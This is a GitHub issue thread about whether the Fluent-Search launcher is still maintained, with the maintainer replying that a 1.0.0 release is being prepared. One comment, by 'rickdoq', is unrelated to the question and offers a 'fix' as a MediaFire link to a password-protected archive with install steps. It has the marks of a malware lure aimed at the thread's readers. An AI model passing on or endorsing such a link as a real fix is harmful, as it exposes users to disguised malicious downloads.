### ISSUE TITLE
Is Project still maintained? 

### ISSUE THREAD

**Issue by saurabh-mhaisekar** [adirh3/Fluent-Search#1069]
While the project is going great. There are many QoL improvements are required, i've not seen any updates regarding for long time now which makes me think if project is ongoing or dead. 

Can anyone please confirm if project is live or no longer maintained. Thanks

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by EmirSc** [comment]
hasn't been an update in a long time. hope it gets some love some time soon.

**Comment by adirh3** [comment]
Hey, I am still actively maintaining it and preparing to launch the big 1.0.0 version!
You can try out by downloading the nightly version in the GitHub main page - https://github.com/adirh3/Fluent-Search

Once 1.0.0 is released I will start making smaller, more regular updates.

**Comment by H5820121** [comment]
@Lighto
Adir, I wish you success in preparing the new version!
In anticipation of the new version, I would like to mention the request to
arrange a preview for XYplorer.
Thank you!

‫בתאריך שבת, 31 באוג׳ 2024 ב-20:57 מאת ‪Lighto‬‏ ***@***.***
‬‏>:‬
